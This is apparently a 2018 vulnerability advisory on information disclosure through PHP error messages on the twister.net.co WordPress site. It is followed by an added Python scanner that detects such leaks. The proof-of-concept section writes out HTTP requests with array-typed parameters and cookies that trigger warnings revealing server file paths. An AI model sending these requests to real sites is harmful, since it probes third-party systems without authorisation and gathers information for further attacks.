TWISTER Peer-To-Peer microblogging: Multiple Application Error Messages (disclosing sensitive information)

2018.10.22
Risk: High
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

TIME-LINE VULNERABILITY

Multiple advisories but no response. Not fixed.

-----------------
Alerts summary
-----------------

Application error message
**********************

/
    author
    cat
    comment_author_email_46104838c3366e1644fd983230bdf8c5
    comment_author_url_46104838c3366e1644fd983230bdf8c5
    feed
    m
    s
    wordpress_46104838c3366e1644fd983230bdf8c5
    wordpress_logged_in_46104838c3366e1644fd983230bdf8c5

/wp-comments-post.php
    author
    comment
    email
    url

/wp-login.php
    comment_author_email_46104838c3366e1644fd983230bdf8c5
    comment_author_url_46104838c3366e1644fd983230bdf8c5
    redirect_to
    user_email
    user_login
    wordpress_46104838c3366e1644fd983230bdf8c5
    wordpress_logged_in_46104838c3366e1644fd983230bdf8c5

I. VULNERABILITY
-------------------------

#Title: TWISTER.NET Multiple Application Error Messages (disclosing sensitive information)
#Vendor:http://www.twister.net.co
#Author:Juan Carlos García (@secnight)
#Verified: Francisco Moraga (@BTShell)
#http://asap-sec.com

II. DESCRIPTION
-------------------------

Twister is a fully decentralized peer-to-peer microblogging platform that builds on the free software implementations of the Bitcoin and BitTorrent protocols.

III. PROOF OF CONCEPT
-------------------------

--Attack details---

Application error message
-------------------------

Vulnerability description
*************************

This page contains an error/warning message that may disclose sensitive information. The message can also contain the location of the file that produced the unhandled exception.

Affected items
---------------

/
/wp-comments-post.php
/wp-login.php

Cookie input comment_author_email_46104838c3366e1644fd983230bdf8c5 was set to sample%40email.tst
Error message found:

    <b>Warning</b>: trim() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/plugin.php</b> on line <b>199</b><br />

URL encoded GET input author was set to 1
Error message found:

    <b>Warning</b>: urldecode() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/query.php</b> on line <b>2519</b><br />

    GET /?author[$secnight]=1&feed=rss2 HTTP/1.1
    Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+
    X-Pingback: http://twister.net.co/xmlrpc.php
    Host: twister.net.co
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate

URL encoded GET input cat was set to 1
Error message found:

    <b>Warning</b>: urldecode() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/query.php</b> on line <b>1771</b><br />

    GET /?cat[$secnight]=1 HTTP/1.1
    Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+
    Host: twister.net.co
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate

Cookie input comment_author_url_46104838c3366e1644fd983230bdf8c5 was set to http%3A%2F%2F1
Error message found:

    <b>Warning</b>: strip_tags() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/formatting.php</b> on line <b>3261</b><br />

    GET / HTTP/1.1
    Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5[]=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+
    Referer: http://twister.net.co:80/
    Host: twister.net.co
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate

URL encoded GET input feed was set to 1
Error message found:

    <b>Warning</b>: strpos() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/class-wp.php</b> on line <b>331</b><br />

    GET /?author=1&feed[$secnight]=1 HTTP/1.1
    Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+
    Host: twister.net.co

Cookie input comment_author_email_46104838c3366e1644fd983230bdf8c5 was set to sample%40email.tst
Error message found:

    <b>Warning</b>: trim() expects parameter 1 to be string, array given in <b>/home/content/68/11448068/html/wp-includes/plugin.php</b> on line <b>199</b><br />

    GET /wp-login.php HTTP/1.1
    Cookie: comment_author_46104838c3366e1644fd983230bdf8c5=1; comment_author_email_46104838c3366e1644fd983230bdf8c5[]=sample%40email.tst; comment_author_url_46104838c3366e1644fd983230bdf8c5=http%3A%2F%2F1; wordpress_test_cookie=WP+Cookie+check; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpress_logged_in_46104838c3366e1644fd983230bdf8c5=+; wordpress_46104838c3366e1644fd983230bdf8c5=+; wordpress_sec_46104838c3366e1644fd983230bdf8c5=+; wordpressuser_46104838c3366e1644fd983230bdf8c5=+; wordpresspass_46104838c3366e1644fd983230bdf8c5=+
    Referer: http://twister.net.co:80/
    Host: twister.net.co

Etc Etc Etc . . .

IV. BUSINESS IMPACT
-------------------------

The impact of this vulnerability: the error messages disclose sensitive information. This information can be used to launch further attacks.

V. SOLUTION
------------------------

Pentesting, Review and Write Secure Code.

VI. CREDITS
-------------------------

This vulnerability has been discovered by Juan Carlos García (@secnight)

VII. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage caused by the use or misuse of this information.
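For defenders checking their own site for the leak described above, the following added example (not part of the original advisory) scans HTTP response bodies for PHP diagnostics and reports which server directory they expose. The function names `find_disclosures` and `audit` and the sample bodies are assumptions made for illustration; only the warning text comes from the advisory.

```python
import html
import posixpath
import re

# PHP diagnostics as rendered with display_errors on, HTML or plain-text form.
PHP_DIAG = re.compile(
    r"(?:<b>)?(?P<level>Warning|Notice|Deprecated|Fatal error|Parse error)(?:</b>)?"
    r":\s+(?P<msg>.*?)\s+in\s+(?:<b>)?(?P<file>/[^<\s]+)(?:</b>)?"
    r"\s+on line\s+(?:<b>)?(?P<line>\d+)",
    re.S,
)

def find_disclosures(body):
    """Return one dict per PHP diagnostic found in an HTTP response body."""
    return [
        {"level": m["level"], "message": html.unescape(m["msg"]),
         "file": html.unescape(m["file"]), "line": int(m["line"])}
        for m in PHP_DIAG.finditer(body)
    ]

def audit(responses):
    """Map each request target to its leaks and derive the exposed server directory."""
    per_url = {url: find_disclosures(body) for url, body in responses.items()}
    dirs = {posixpath.dirname(h["file"]) for hits in per_url.values() for h in hits}
    leaked_root = posixpath.commonpath(sorted(dirs)) if dirs else None
    return per_url, leaked_root

# Constructed sample bodies: warning text from the advisory, surrounding HTML invented.
ROOT = "/home/content/68/11448068/html/wp-includes"
SAMPLE = {
    "/?cat[$secnight]=1": "<br />\n<b>Warning</b>:  urldecode() expects parameter 1 to be "
    f"string, array given in <b>{ROOT}/query.php</b> on line <b>1771</b><br />\n<html>",
    "/wp-login.php": "<b>Warning</b>: trim() expects parameter 1 to be string, "
    f"array given in <b>{ROOT}/plugin.php</b> on line <b>199</b><br />",
    # Same kind of message with html_errors off (plain text), constructed variant.
    "/?author=1&feed[$secnight]=1": "Warning: strpos() expects parameter 1 to be string, "
    f"array given in {ROOT}/class-wp.php on line 331",
    "/about": "<html><body><p>No diagnostics on this page.</p></body></html>",
}

if __name__ == "__main__":
    per_url, root = audit(SAMPLE)
    for url, hits in per_url.items():
        for h in hits:
            print(f"{url}: {h['level']} in {h['file']}:{h['line']} ({h['message']})")
    print("server directory exposed:", root)
```

Any hit means the PHP `display_errors` directive is enabled on a public-facing host; turning it off and logging errors server-side removes the disclosure without hiding the underlying warnings from operators.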

